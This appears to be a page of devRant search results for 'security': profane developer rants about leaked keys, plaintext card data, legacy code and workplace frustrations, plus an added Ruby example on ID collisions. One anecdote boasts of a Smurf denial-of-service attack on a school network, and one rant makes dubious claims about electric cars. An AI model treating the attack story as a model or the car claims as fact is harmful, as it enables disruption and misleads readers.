Search - "security"
-
Manager: We need to setup the security in the Mexico server
Dev: You mean that 3rd party firewall add on?
Manager: Yes
Dev: And set up the billing on the Mexico account?
Manager: Yes
Dev: lol, sure thing I’ll create the ticket
Manager: What’s so funny?
Dev: Nothing
Ticket: Build wall and get Mexico to pay for it.
-
Another story on the spirit of wk93. TL;DR I DOS'd the whole campus network for some beers.
In high school teachers had this blackboard system (a sort of moodle) and we used to have really lazy teachers who only read the PowerPoint presentations and made us take notes. One day I was fed up with their bullshit and figured these lazy ass professors wouldn't "teach" crap as soon as there was no internet connection...so the race was on...
10 minutes before the bell rang a friend and I managed to break into a computer lab, I booted up Kali and searched for the access points, 3 routers through the building all with CISCO OS.
I figured they had all the default configs, time was running out so I decided to Smurf the three access points with the lab's IP range, scheduled an automatic shutdown in 2 hours and blocked the PC. The bell rang and as predicted, no internet, no class, my friends and I used that free time to go to a bar (on a Monday afternoon).
Funny side note, since the 3 routers were down the whole network collapsed, no cameras, no access control, no faculty network or any network. We kept doing it and every time we did campus security would be desperately searching for someone with a black hoodie.
-
Storytime!
Manager: Hey fullstackchris, the maps widget on our app stopped working recently...
Dev: (Skeptical, little did he know) Sigh... probably didn't raise quota or something stupid... Logs on to google cloud console to check it out...
Google Dashboard: Your bill.... $5,197 (!!!!!!) Payment method declined (you think?!)
Dev: 😱 WTF!?!?!! (Calls managers) Uh, we have HUGE problem, charges for $5000+ in our google account, did you guys remove the quota limits or not see any limit reached warnings!?
Managers: Uh, we didn't even know that an API could cost money, besides, we never check that email account!
Dev: 🤦♂️ yeah obviously you get charged, especially when there have literally been millions of requests. Anyway, the bigger question is where or how our key got leaked. Someone started hammering one of the google APIs with one of our keys (Proceeds to hunt for usages of said API key in the codebase)
Dev: (sweating 😰) did I expose an API key somewhere? Man, I hope it's not my fault...
Terminal: grep results in, CMS codebase!
Dev: ah, what do we have here, app.config, seems fine.... wait, why did they expose it to a PUBLIC endpoint?!
Long story short:
The previous consulting goons put our Angular CMS JSON config on a publicly accessible endpoint.
WITH A GOOGLE MAPS API KEY.
JUST CHILLING IN PLAINTEXT.
Though I'm relieved it wasn't my fault, my faith in humanity is still somewhat diminished. 🤷♂️
Oh, and it's only Monday. 😎
Cheers!
-
Fuck the memes.
Fuck the framework battles.
Fuck the language battles.
Fuck the titles.
Anybody who has been in this field long enough knows that it doesn't matter if you're Linus fucking Torvalds, there is no human who has lived or ever will live that simultaneously understands, knows, and remembers how to implement, in multiple languages, the following:
- jest mocks for complex React components (partial mocks, full mocks, no mocks at all!)
- token cancellation for asynchronous Tasks in C#
- fullstack CRUD, REST, and websocket communication (throw in gRPC for bonus points)
- database query optimization, seeding, and design
- nginx routing, https redirection
- build automation with full test coverage and environment consideration
- docker container versioning, restoration, and cleanup
- internationalization on both the front AND backends
- secret storage, security audits
- package management, maintenance, and deprecation reviews
- integrating with dozens of APIs
- fucking how to center a div
and that's a _comically_ incomplete list; barely scratches the surface of the full range of what a dev can encounter in a given day of writing software
have many of us probably done one or even all of these at different times? surely.
but does that mean we are supposed to draw that up at a moment's notice some cookie-cutter solution like a fucking robot and spit out an answer on a fax sheet?
recruiters, if you read this site (perhaps only the good ones do anyway so it's wasted oxygen), just know that whoever you hire it's literally the luck of the draw of how well they perform during the interview. sure, perhaps some perform better, but you can never know how good someone is until they literally start working at your org, so... have fun with that.
Oh and I almost forgot, again for you recruiters, on top of that list which you probably won't ever understand for the entirety of your lives, you can also add writing documentation, backup scripts, and orchestrating / administrating fucking JIRA or actually any somewhat technical dashboard like a CMS or website, because once again, the devs are the only truly competent ones - and i don't even mean in a technical sense, i mean in a HUMAN sense of GETTING SHIT DONE IN GENERAL.
There's literally 2 types of people in the world: those who sit around drawing flow charts and talking on the phone all day, and those WHO LITERALLY FUCKING BUILD THE WORLD
why don't i just run the whole fucking company at this point? you guys are "celebrating" that you made literally $5 dollars from a single customer and i'm just sitting here coding 12 hours a day like all is fine and well
i'm so ANGRY it's always the same no matter where i go, non-technical people have just no clue, even when you implore them how long things take, they just nod and smile and say "we'll do it the MVP way". sure, fine, you can do that like 2 or 3 times, but not for 6 fucking months until you have a stack of "MVPs" that come toppling down like the garbage they are.
How do you expect to keep the "momentum" of your customers and sales (I hope you can hear the hatred of each of these market words as I type them) if the entire system is glued together with duct tape because YOU wanted to expedite the feature by doing it the EASY way instead of the RIGHT way. god, just forget it, nobody is going to listen anyway, it's like the 5th time in a row in my life
we NEED tests!
we NEED to know our code coverage!
we NEED to design our system to handle large amounts of traffic!
we NEED detailed logging!
we NEED to start building an exception database!
BILBO BAGGINS! I'm not trying to hurt you! I'm trying to help you!
Don't really know what this rant was, I'm just raging and all over the place at the universe. I'm going to bed.
-
I have spent 20 minutes explaining to a contractor how to stage a file in git and what a filepath is.
It's moments like this where I stop worrying about my job security
-
Oh you're a frontend guy? Good, we need one of those.
Oh you're a backend guy too? Good, we need one of those.
Oh you're a security guy too? Good, we need one of those.
Oh you're a devops guy too? Good, we need one of those.
Oh you're a QA guy too? Good, we need one of those.
Oh you're an SEO guy too? Good, we need one of those.
"Well, sorry to say fullStackCraft, but we found your cloud architecture skills just a little too lacking for this position. We really need someone who can do frontend, backend, security audits, QA assessments, SEO, AND build scaling cloud architecture. Oh and while you're at it, can you turn fucking water into gold? We need that at our company too. You didn't get the position, but it'd be great if you could refer us to someone who is very advanced in fucking alchemy. Thanks!"
Absolutely toxic the way software people are treated I swear. The money may be the only good thing that is left.
-
Dude
The client has a giant database with all credit and debit cards
ALL INFOS IN FUCKING PLAINTEXT
THE CARD NUMBER
THE CVV
THE EXPIRY DATE
I'M SHAKING AF
-
micromanager: "Quick and easy win! Please have this done in 2-3 days to start repairing your reputation"
ticket: "Scrap this gem, and implement your own external service wrapper using the new and vastly different Slack API!"
slack: "New API? Give me bearer tokens! Don't use that legacy url crap, wth"
prev dev: "Yeah idk what a bearer token is. Have the same url instead, and try writing it down so you don't forget it?"
Slack admin: "I can't give you access to the slack integration test app, even though it's for exactly this and three others have access already, including your (micro)manager."
Slack: "You can also <a>create a new slack app</a>!" -- link logs me into slack chat instead. After searching and finding a link elsewhere: doesn't let me.
Slack admin: "You want a new test slack app instead? Sure, build it the same as before so it isn't abuseable. No? Okay, plan a presentation for it and bring security along for a meeting on Friday and I'll think about it. I'm in some planning meetings until then."
asdfjkagel.
This job is endless delays, plus getting yelled at over the endless delays.
At least I can start on the code while I wait. Can't test anything for at least a week, though. =/
-
Yesterday,
I was a bit drunk.
But I wanted to improve security of the company. So, I went in Azure and activated “Security defaults” which forces MFA for all users in the company. (Because RH always forget to enable MFA for new employees, and I actually care about security)
Then I went in office 365 management and instead of resetting MFA for all users (Forcing everyone to redo MFA setup), I (by mistake) clicked on reset all passwords.
I tested my own account it was fine and went to sleep.
Got a call from CEO at 7am, all 30 employees cannot login in, cannot work.
What a shit show I made…
I have a call with CEO in about 2 hours, I don’t even know how to justify myself…
So children: don’t activate company wide options while drunk. Ever.
-
ARGH. I wrote a long rant containing a bunch of gems from the codebase at @work, and lost it.
I'll summarize the few I remember.
First, the cliche:
if (x == true) { return true; } else { return false; };
Seriously written (more than once) by the "legendary" devs themselves.
Then, lots of typos in constants (and methods, and comments, and ...) like:
SMD_AGENT_SHCEDULE_XYZ = '5-year-old-typo'
and gems like:
def hot_garbage
  magic = [nil, '']
  magic = [0, nil] if something_something
  success = other_method_that_returns_nothing(magic)
  if success == true
    return true # signal success
  end
end
^ That one is from our glorious self-proclaimed leader / "engineering director" / the junior dev thundercunt on a power trip. Good stuff.
Next up are a few of my personal favorites:
Report.run_every 4.hours # Every 6 hours
Daemon.run_at_hour 6 # Daily at 8am
LANG_ENGLISH = :en
LANG_SPANISH = :sp # because fuck standards, right?
And for design decisions...
The code was supposed to support multiple currencies, but just disregards them and sets a hardcoded 'usd' instead -- and the system stores that string on literally hundreds of millions of records, often multiple times too (e.g. for payment, display fees, etc). and! AND! IT'S ALWAYS A FUCKING VARCHAR(255)! So a single payment record uses 768 bytes to store 'usd' 'usd' 'usd'
I'd mention the design decisions that led to the 35 second minimum pay API response time (often 55 sec), but i don't remember the details well enough.
Also:
The senior devs can get pretty much anything through code review. So can the dev accountants. and ... well, pretty much everyone else. Seriously, i have absolutely no idea how all of this shit managed to get published.
But speaking of code reviews: Some security holes are allowed through because (and i quote) "they already exist elsewhere in the codebase." You can't make this up.
Oh, and another!
In a feature that merges two user objects and all their data, there's a method to generate a unique ID. It concatenates 12 random numbers (one at a time, ofc) then checks the database to see if that id already exists. It tries this 20 times, and uses the first unique one... or falls through and uses its last attempt. This ofc leads to collisions, and those collisions are messy and require a db rollback to fix. gg. This was written by the "legendary" dev himself, replete with his signature single-letter variable names. I brought it up and he laughed it off, saying the collisions have been rare enough it doesn't really matter so he won't fix it.
Yep, it's garbage all the way down.
-
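The ID-generation defect described in the rant above, reproduced as an added example (not the codebase's own code, and the database lookup is stood in for by an array): the flawed generator falls through to its last attempt and hands back a known duplicate once the ID space is dense, while the safer form draws from a far larger space and raises on exhaustion so the unique constraint, not a later rollback, is what catches the failure. A birthday-bound helper shows why 12 digits with hundreds of millions of records collide as a matter of course.

```ruby
require 'securerandom'

# Flawed generator as the rant describes it: concatenate `digits` random
# digits one at a time, check whether that id already exists, retry up to
# `attempts` times, and if every attempt collides return the last one anyway.
# `existing` stands in for the DB lookup and `rng` is injectable so a run is
# reproducible (both constructed for this example).
def flawed_unique_id(existing, digits: 12, attempts: 20, rng: Random.new)
  candidate = nil
  attempts.times do
    candidate = Array.new(digits) { rng.rand(10) }.join
    return candidate unless existing.include?(candidate)
  end
  candidate # falls through: a duplicate is silently handed to the caller
end

class IdExhausted < StandardError; end

# Safer form: 128 bits of entropy per candidate, and on exhaustion an
# exception rather than a duplicate. `generator` is injectable only so the
# exhaustion path can be exercised deterministically (constructed here).
def safe_unique_id(existing, attempts: 5, generator: -> { SecureRandom.hex(16) })
  attempts.times do
    candidate = generator.call
    return candidate unless existing.include?(candidate)
  end
  raise IdExhausted, "no unique id after #{attempts} attempts"
end

# Birthday-bound estimate: probability that at least one collision has
# occurred among `n` ids drawn uniformly from `space` possible values.
def collision_probability(n, space)
  1.0 - Math.exp(-n.to_f * (n - 1) / (2.0 * space))
end

if __FILE__ == $PROGRAM_NAME
  # Constructed dense space: every 2-digit id is already taken, so the flawed
  # generator cannot find a free one and returns a duplicate after 20 tries.
  taken = (0..99).map { |i| format('%02d', i) }
  dup = flawed_unique_id(taken, digits: 2, rng: Random.new(42))
  puts "flawed generator returned #{dup}, already taken: #{taken.include?(dup)}"

  # With the rant's 12-digit space, a million records already give roughly a
  # 39% chance of a collision; hundreds of millions make it a certainty.
  puts format('P(collision), 1e6 ids in 10^12 space: %.3f',
              collision_probability(1_000_000, 10**12))
  puts format('P(collision), 1e8 ids in 10^12 space: %.3f',
              collision_probability(100_000_000, 10**12))

  begin
    safe_unique_id(taken, attempts: 3, generator: -> { '07' })
  rescue IdExhausted => e
    puts "safe generator refused to guess: #{e.message}"
  end
end
```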
Some 'wk306' highlights from different people:
Walk around the office in his underwear, because he forgot he left his trousers in the bathroom
Run a red light outside the office due to not wearing his required glasses. When questioned by co-workers, replied "I don't follow those fascist rules"
Asking if we work less will we get paid more, because the project will take longer to do (while in a startup with no funding trying to secure some)
Tell a senior dev to stop testing in his spare time, as we won't be able to release on time if he keeps finding critical security bugs
Telling me "your timezone is not my concern", when asking for help with new tooling so we don't have to be online at the same time
Blaming my team for requesting too much help, leading to his team missing deadlines, in a meeting with very senior managers. When the reason we were requesting help was the handover doc we were given was filled with lies about features being finished and "ready to ship" and lacking any unit tests
Being accused of bullying and harassment to the CEO, because someone asked "did you follow up with X about the partnership they emailed us about". The person who was responsible, forgot 4 times, and saw it as an "attack" to mention it in team meetings
Telling an entire office/building mid November they've secured funding for at least the next year, then announcing in January after the Christmas break that it's cheaper to move to India, so they are closing the office in 30 days
-
Doing some Christmas shopping.
Creating some throwaway accounts in various e-shops
Some e-shops send me my password via email upon registration.
I've spent the better half of a day emailing those e-shops to revise their IT security policies.
Haven't bought a single gift yet.
Time well spent!
-
While writing up this quarter's performance review, I re-read last quarter's goals, and found one my boss edited and added a minimum to: "Release more features that customers want and enjoy using, prioritized by product; minimum 4 product feature/bug tickets this quarter."
... they then proceeded to give me, not four+ product tickets, but: three security tickets (two of which are big projects), a frontend ticket that should have been assigned to the designer, and a slow query performance ticket -- on top of my existing security tickets from Q3.
How the fuck was I supposed to meet this requirement if I wasn't given any product tickets? What, finish the monster tickets in a week instead of a month or more each and beg for new product tickets from the product manager who refuses to even talk to me?
Fuck these people, seriously.
-
So, you want to tell me the security method used by the f*cking state of Missouri is CSS's "display: none"???
Source: https://missouriindependent.com/202...
-
The deeper I go down the infosec rabbit hole, the more I worry about my doctors still using Windows XP. Why would you save sensitive patient info in those....shoe boxes?
-
I just had to print out some bills for a colleague.
Nothing too bad you say?
Well.. She doesn't seem to care about security or privacy at all.
I opened the website of her email provider at my computer and moved away from the keyboard, so she could log in.
But instead she told me her email and password... In an office with some other colleagues... Multiple times and wrote it onto a piece of paper that she later left on my table.
After that I should look through her inbox to find the bills.
(Yup, I know a lot more about her now)
After finding and printing out her bills, she just thanked me and walked out of the office, because hey, why should I log out of her account?
It's nice that she trusts me... But that was a bit too much...
-
I watched the news recently and they talked about cyber security.
To demonstrate "how serious the topic is" they showed a screen with a terminal and literally pinged google.com.
I thought that was funny
-
My CTO prefers to hire very expensive consultants than to trust staff. It's funny, because he also decided that all technical teams should run on the absolute minimal amount of resources.
You can't imagine how shitty it felt this morning when he sent an email talking about a security consultant that we should hire, just because he thinks the guy could "take our expertise to the next level".
They will charge us 450/hour to run assessments, to find the exact same things my team discovered a year ago.
-
Google cripples ad and tracking blockers: In January, Chromium will switch to Manifest V3 which removes an essential API in favour of an inferior one. As usually, Google is being deceitful and touts security concerns as pretext.
That hits all Chromium based browser, such as my beloved Vivaldi. The team argues with their own browser internal blocker, but that's far worse than uBlock Origin. One of Vivaldi's core promises was privacy, and that will go out of the window. The team simply doesn't react to people pointing that out. They're fucked, and they know it.
So what now? Well, going back to Firefox because that will include the crippled new API for extension compatibility, but also keep the powerful old one specifically so that ad and tracking blockers will keep working. Google has just handed Mozilla a major unique selling point, and miraculously, Mozilla didn't fuck it up.
-
Devs: Hey, what should we do?
A:
provide our SDKs for download as easily as possible so that any potential customer can try it out and see how much better we are compared to our competitors?
Or…
B:
Should we lock our SDKs behind a login where the customer needs to create an account and enter the most amount of private information possible, just in case, then also require to create some security access tokens that he needs to configure in his app to have access to our service via the sdk and also hide all of the documentation behind a login which requires some permission based roles to access and also make the sdks closed source so that it’s a pain in the ass to debug and understand?
Marketing people:
B! Definitely B! Make sure to piss off and annoy our customers as much as humanly possible!
-
IE is dead ?!
NOT SO FAST.
The whole sign-in in Visual 2022 uses... Internet explorer renderer and... doesn't work on a Windows Server 2022 because of... "Enhanced internet explorer security policy".
I'm dying inside.
-
Well, for starters there was a cron to restart the webserver every morning.
The product was 10+ years old and written in PHP 5.3 at the time.
Another cron was running every 15 minutes, to "correct" data in the DB. Just regular data, not from an import or something.
Gotta have one of those self-healing systems I guess.
Yet another cron (there were lots) did run every day from 02:00 to 4ish to generate the newest xlsx report. Almost took out the entire thing every time. MySQL 100%. CPU? Yes. RAM? You bet.
Lucky I wasn't too much involved at the time. But man, that thing was the definition of legacy.
Fun fact: every request was performed twice! First request gave the already logged-in client a unique access-token. Second request then processed the request with the (just issued) access-token; which was then discarded. Security I guess.
I don't know why it was built this way. It just was. I didn't ask. I didn't want to know. Some things are better left undisturbed. Just don't anger the machine. I became superstitious for a while. I think, in the end, it helped a bit: It feels like communicating with an alien monster but all you have is a trumpet and chewing gum. Gentle does it.
Oh and "Sencha Extjs 3" almost gave me PTSD lol (it's an ancient JS framework). Followed by SOAPs WSDL cache. And a million other things.
-
DEAR CTOs, PLEASE ASK THE DEVELOPER OF THE SOFTWARE WHICH YOU ARE PLANNING TO BUY IN WHAT LANGUAGE AND WHAT VERSION THEY ARE WRITTEN IN.
Background: I worked a LONG time for a software company which developed a BIG crm software suite for a very niche sector. The software company was quite successful and got many customers, even big companies bought our software. The thing is: The software is written in Ruby 1.8.7 and Rails 2. Even some customer servers are running debian squeeze... Yes, this setup is still in production use in 2022. (Rails 7 is the current version). I really don't get it why no one asked for the specific setup, they just bought it. We always told our boss, that we need time to upgrade. But he told every time, no one pays for a tech upgrade... So there it is, many TBs of customer data are in systems which are totally old, not updated and with possibly security issues.
-
We had an obligatory training today about security of remote access to company resources.
We sat for an hour listening to some outdated advice regarding passwords and preparing a work environment at home. Finally the instructor said his goodbyes and left. The rest of us stayed in the call to pass some actual recommendations.
Then we received a join request from a waiting lobby. Everyone muted. I let the guy in. For the next 8 minutes we watched the unaware instructor eat his breakfast and sign some documents stamped with a logotype of our competition.
Then I cleared my throat very loudly. He will have to print some of those documents again.
-
Stop calling people by their old occupation titles. .
Please address them by using their new titles accordingly
and they will like it their job more.
OLD: *Garden Boy*
NEW: *Landscape Executive and Animal Nutritionist*
OLD: *Petrol attendant*
NEW: *Fuel transmission engineer*
OLD: *Receptionist*
NEW: *Front Desk Controller*
OLD: *Typist*
NEW: *Printed Document Handler*
OLD: *Messenger*
NEW: *Business Communication Conveyer*
OLD: *Window Cleaner*
NEW: *Transparent Wall Technician*
OLD: *Temporary Teacher*
NEW: *Associate Teacher*
OLD: *Tea Boy*
NEW: *Refreshment Director*
OLD: *Garbage Collector*
NEW: *Environmental Sanitation Technician*
OLD: *Guard*
NEW: *Security Enforcement Director*
OLD: *Prostitute*
NEW: *Practical Sexual Relations Officer*
OLD: *Thief*
NEW: *Wealth Relocation Officer*
OLD: *Driver*
NEW: *Automobile Propulsion Specialist*
OLD: *Maid*
NEW: *Domestics Managing Director*
OLD: *Cook*
NEW: *Food Chemist*
OLD: *Gossip*
NEW: *Oral Research and Evaluation Director*
Which one got you more?
-
Cyber security. Deep knowledge of cyber security and networks is what I wish I had. The math stuff that no one bothers with, specifically.
-
News like the "social score" travel ban in China really makes me hate social networking and how by developing better technologies we further the capability of Orwellian governments to infringe human rights.
But the most depressing thing is we are in a similar watered down version of it, think about it; what you post, what you say, who you follow, what you read, the videos you watch, where you've worked everything follows you. You can't get a job at a company that disapproves your thoughts, study in a college who is more concerned about your ideology rather than teaching...we are slowly but surely becoming a "free" China.
Source: China to ban citizens with bad ‘social credit’ from some forms of travel http://go.newsfusion.com/security/...
-
Me: API support, please check why I'm getting ECONNTIMEDOUT for 3% of requests
supp: before we look into this, please answer these questions: a), b), c), d), e)
Me and colleague: *spend 20 minutes gathering all the details into a nice answer. Post the answers*
Slack bot: *removes the answer [allegedly for compliance/security]*
api supp: any update?
..... I really want to smash smth. Hulk SMASH!!!
-
I tweeted a silly story about how I accidentally hacked my principal's email account when I was in middle school. (Yes, I did say "accidentally". The school network's security was that bad.)
Within minutes I had four replies telling me to contact people on Instagram to get my hacked account back. I guess I said the magic words and triggered some bots.
https://twitter.com/EmberQuill/...
-
Electric cars are not better for the environment. All petrol cars combined are only responsible for 7.9% of CO2 emissions. If your electric car is charged from a grid that is powered by a coal-burning power station, it contributes nothing to dealing with climate change. It only provides you with the false sense of security, and you can look cool telling your friends that “you know, I drive a Tesla, I’m environmentally conscious, your gas car is bad”.
Electric cars are lame. When I’m out of fuel, I can refuel fully in minutes. With electric car, I’ll have to wait at least five hours. Let’s be realistic, superchargers aren’t common, and will never be.
Gasoline is 46.4 MJ/kg, or 34.2 MJ/l. Li-Ion is 0.36–0.875. Let’s be generous and say it’s 0.9. To match 1 kg of petrol, I would need 51 kilos of batteries.
Average gas tank is 18 gallons, or 68 litres. To match that, my battery must have a weight of 2.5 metric tonnes. Bear in mind, empty battery and full battery has the same weight. Also, bear in mind, batteries perform worse in the winter.
As per energy density and practicality, things don’t get much better than petrol. Liquid hydrogen has higher energy density, but to store it, gas tank has to have very, very thick walls, to withstand the pressure. And, hydrogen is a bitch. It’s extremely dangerous. You can’t smell it until it’s too late. Hydrogen-air mixture will explode if you look at it the wrong way.
All that “electric cars good for climate” hype is merely Elon maintaining his stock bubble.
-
Years ago I used to work a guvmant site. They had really strict security rules for internet and how you spent your time. Makes sense considering what that site did. I was a support engineer for some of their process control equipment.
I was approached by an operator supervisor to install dvd player software on a business machine (non process related). Basically just a general purpose PC with no function other than time cards and general office use. I was fine with the request, but the reason was for watching movies during a holiday period by the operators. Not for anything official. So I made some noise about my dislike of this request feigning moral superiority. But the supervisor swore up and down it was for "training" dvds.
So I wrote a simple windows script. The script basically popped up a window that said:
"Security has detected unauthorized media inserted into this machine. Please state the reason for this infraction." It provided a dialog to enter a justification. After you entered the justification it said: "Security has been contacted and your user logged. You will be contacted shortly."
This script was then attached to the supervisor's Start folder so it ran when he, and only he logged in. We made sure the "training" video (some movie) was already inserted at this point.
He logged in. He just about shit his pants when reading this. He promptly logged and left the building to walk somewhere else in the site. We called him and let him know it was a gag. His response: That son of a bitch Demolishun!
-
Wrote some code that solved a program in a semi unique way for the codebase. As in not oft used functionality of language.
Some time later... This might be hard to understand. Maybe I should do a different way.
Some time later... No, I will leave a comment to describe what is going on.
Some time later... That comment is kind of cryptic. Maybe should rethink.
Some time later... No, if the next dev doesn't know how this works then they should learn how it works. (reasoning here is that the functionality requires a knowledge of internals of language)
Some time later... Also, if nobody else gets this then they have to ask me how it works. Job security?
Some time later... STOP THINKING ABOUT THIS CODE AND MOVE ON!
-
When I need cash, sometimes I go to my clients and sell them "security updates"...
I am a one (wo)man Mafia!
-
That log4j RCE is some fucking nasty business!!! Its exploits have already been observed multiple times in our company scope.
Time for some unplanned Saturday evening hot-patches :/
P.S. Why the fuck leave such a feature enabled as default??? I mean really, whose brilliant idea was "let's leave the message parser enabled as well as the LDAP query hooks... BY FUCKING DEFAULT!!!"
I mean really, is anyone using that? ANYONE?
And then they laugh at me when I say "stay away from frameworks", "use as little libraries as possible", "avoid foreign code in your codebase",...
you know what.... JOKE'S ON YOU!
-
Why I love Salesforce 👀
- Run a test method
- failure: no field found
- checks test, queries field
- checks field security (access permissions) visible to user
- runs test again
- failure: no field found
- adds debug log of queried field
- runs test again
- success
Thanks, thanks for fucking with me today 🥲
-
I should just quit. I am not paid enough to deal with this pissing contest.
Reviewer:
Need to add instructions (on readme) for installing pnpm, or if possible, have the top-level npm i install it (lol).
Also, it looks like we are no longer using lerna? If that's right, let's remove the dependency; its dependencies give some security audit messages at install.
Me:
it's good enough for now. Added a new ticket to resolve package manager confusions. (Migrate to pnpm workspaces)
Reviewer:
I will probably be responsible for automating deployment of this (I deployed the webapp on cloudflare pages and there is no work that needs to be done. "automating deployment" literally means replacing npm with pnpm). I disagree that it's good enough for now.
Imagine all readmes on github document how to install yarn/pnpm.
Lesson learned:
If you think an OOP static site developer can't handle modern JS framework, you are probably right.
-
105 pages of information security policy to read through before getting through onboarding that could have been summarized as: "This is 2022. Don't be an idiot."
Also 40 pages of code of conduct that could have been summarized thusly: "This is 2022. Everyone is offended by everything. Shut your cakehole, put your head down, don't make eye contact, and just do your job."
-
Working in security for many years only granted me world-class paranoia about taking pictures of myself and my family. It even made it hard to keep in touch with my friends as we don’t live in the same country anymore.
The good side is that it pays well enough to grant me a platinum foil hat.
-
I think what would help is to teach them these things:
- awareness for security in code
- how to use a fucking VCS like Git and how it works
-
I found this old printout of my username and password for my school account from ca 2008. I really like how the password is the same as the username except for some capitalization 😂😅
“sECurItY”
-
CR: "Add x here (to y) so it fits our code standards"
> No other Y has an X. None.
CR: "Don't ever use .html_safe"
> ... Can't render html without it. Also, it's already been sanitized, literally by sanitize(), written by the security team.
CR: "Haven't seen the code yet; does X change when resetting the password?"
> The feature doesn't have or reference passwords. It doesn't touch anything even tangentially related to passwords.
> Also: GO READ THE CODE! THAT'S YOUR BLOODY JOB!
CR: "Add an 'expired?' method that returns '!active'?"
> Inactive doesn't mean expired. Yellow doesn't mean sour. There's already an 'is_expired?' method.
CR: "For logging, always use json so we can parse it. Doesn't matter if we can't read it; tools can."
CR: "For logging, never link log entries to user-readable code references; it's a security concern."
CR: "Make sure logging is human-readable and text-searchable and points back to the code."
> Confused asian guy, his hands raised.
CR: "Move this data formatting from the view into the model."
> No. Views are for formatting.
CR: "Use .html() here since you're working with html"
> .html() does not support html. It converts arrays into html.
NONE OF THIS IS USEFUL! WHY ARE YOU WASTING MY TIME IF YOU HAVEN'T EVEN READ MY CODE!?
dfjasklfagjklewrjakfljasdf
-
Excerpts from "Bastard devops from hell" checklist:
- Insistently pronounce git with a soft "G" and refuse to understand people not using that pronunciation, the same goes for jithub, jitlab, jit lfs, jitkraken etc.
- Reject all pull requests not in haiku format, suggest the author needs to be more culturally open minded when offending.
- increment version numbers ONLY based on percentage code changed: Less than 1% patch increment, less than 5% minor increment, more than that major version increment.
- Cycle ALL access keys, personal tokens, connection strings etc. every month "for security reasons"
- invent and only allow usage of your own CI/CD language, for maximum reuse of course. Resist any changes to it after first draft release
-
The more I look into Windows 11 the more I hate it. There's just 1 (one) more thing that's wrong with it every time I look.
It's a security and ethical nightmare. I almost wish I didn't specialize in computer recovery & cybersecurity.
So thankful that my high-end gaming-built PC is apparently "not compatible" with Windows 11. Oh, you don't want to break my computer and ruin my entire life? That's actually a compliment, man.
-
!rant Security training at work comes in the form of a serialized TV show where each episode concerns some security topic kind of tangentially and ends with a “REMEMBER… “ followed by the lesson you were supposed to get from the episode.
I kind of love it. A lot. I actually look forward to security training, and I’m not the only one. They stagger the release so you can’t binge watch all the seasons at once and you get three episodes at a time. 😂
-
I know folks do their best, but come on Apple, this can't be that hard. Bought an iPhone at an estate sale (elderly individual died suddenly, so no one had knowledge of the Apple ID, passwords, etc.) and I've been trying to convince Apple to clear the activation lock. (AS = Apple Support)
<after explaining the situation>
AS: "Have you tried putting the phone in recovery mode? That should clear the lock"
Me: "I've already done that. It prompts for the apple id and password, which I don't have"
AS: "You need to talk to the owner and get the information"
Me: "As I explained, I purchased the phone at an estate sale of someone who died. I have the bill of sale, serial number, the box, obituary. What else do you need?"
AS: "Have you tried contacting a family member? They might have that information."
Me: "The family members at the sale told us this is all they had. This kind of thing has to happen. I can't believe Apple can't clear the activation lock."
AS: "Yes, we can, but I'm very sorry we take security seriously."
Me: "I understand, what do I do now?"
AS: "Did you log out of the phone? Go to settings ..."
Me: "Yes, I tried all those steps before calling. It prompts for the AppleID and password."
AS: "Did you try entering the password?"
Me: "No, I don't have it. I already explained there is no way to know"
AS: "Yes..yes...sorry...I'm just reading the information in front of me. I found something, have you tried submitting an activation lock removal request?"
Me: "Yes, it was denied, didn't tell me why, which is why I'm calling. What about taking this phone to an Apple store? I have all the paperwork."
AS: "Sure, you can try. You might need the death certificate. The family or the coroner will have a copy."
Me: "What!? Apple requires a death certificate to unlock a phone!? I'm pretty sure not even the family is going to give a total stranger a death certificate"
AS: "Sorry sir, I'm just reading what is in front of me. Without that certificate, there is no way to prove the person died. You can try the Apple store, but they will likely require it."
Me: "That's a lot of drama for unlocking a phone. A *phone*"
AS: "Yes sir, I understand. If there is anything else we can do let us know and thank you for being an Apple customer."
Next stop, the Apple Store.
-
May be just me, but I am quite frustrated with complexity of systems nowadays, even more how it’s became a norm for developers to import a library for every little sh*t…
Like, do you even need to import that OSS library, can’t you make it without it? Is it really worth it to import that monstrous library of 10k loc, just so you can save writing those 50loc for just once?
It almost feels like it’s driven by the logic “if you don’t own the code, then you don’t need to maintain it”. But ironically you still need to maintain it, only now not the code (best case), but the library itself. You have to upgrade it (for security, bug fixes) and you better pray there’re no breaking changes. And if you encounter an edge case/bug that no one addressed yet, then well, I bet you wished you didn’t use that library in the first place.
It’s so much easier to support small piece of code within your codebase, than fix a bug in a library, that possibly has thousands of unnecessary dependencies, enormous abstraction trees, and infinity loc to support all possible use cases, which your project doesn’t even care about.
Just to make it clear, I am not talking, about cases where some library would really do some heavy lifting for you, it would be non-sensical not to use it in that case.
And talking about complexity, let’s not even mention microservices, kubernetes, and other hyped stuff…
Does anyone else share the sentiment?
-
I don't know if I'm being pranked or not, but I work with my boss and he has the strangest way of doing things.
- Only use PHP
- Keep error_reporting off (for development), Site cannot function if they are on.
- 20,000 lines of functions in a single file, 50% of which was unused, mostly repeated code that could have been reduced massively.
- Zero Code Comments
- Inconsistent variable names, function names, file names -- I was literally project searching for months to find things.
- There is nothing close to a normalized SQL Database, column ID names can't even stay consistent.
- Every query is done with a mysqli wrapper to use legacy mysql functions.
- Most used function is to escape strings
- Type-hinting is too strict for the code.
- Most files packed with Inline CSS, JavaScript and PHP - we don't want to use an external file otherwise we'd have to open two of them.
- Do not use a package manager (composer) because he doesn't have it installed.. Though I told him it's easy on any platform and I'll explain it.
- He downloads a few composer packages he likes and drag/drop them into random folder.
- Uses $_GET to set values and pass them around like a message container.
- One file is 6000 lines which is a giant if statement with somewhere close to 7 levels deep of recursion.
- Never removes his old code that bloats things.
- Has functions from a decade ago he would like to save to use some day. Just regular, plain old, PHP functions.
- Always wants to build things from scratch, and re-using a lot of his code that is honestly a weird way of doing almost everything.
- Using CodeIntel, Mess Detectors, Error Detectors is not good or useful.
- Would not deploy to production through any tool I setup, though I was told to. Instead he wrote bash scripts that still make me nervous.
- Often tells me to make something modern/great (reinventing a wheel) and then ends up saying, "I think I'd do it this way... Refers to his code 5 years ago".
- Using isset() breaks things.
- Tens of thousands of undefined variables exist because arrays are created like $this[][][] = 5;
- Understanding the naming of functions required me to write several documents.
- I had to use #region tags to find places in the code quicker since a router was about 2000 lines of if else statements.
- I used Todo Bookmark extensions in VSCode to mark and flag everything that's a bug.
- Gets upset if I add anything to .gitignore; I tried to tell him it ignores files we don't want, but he thought it deleted them for a while.
- He would rather explain every line of code in a mammoth project that follows no human known patterns, includes files that overwrite global scope variables, and has me do the documentation.
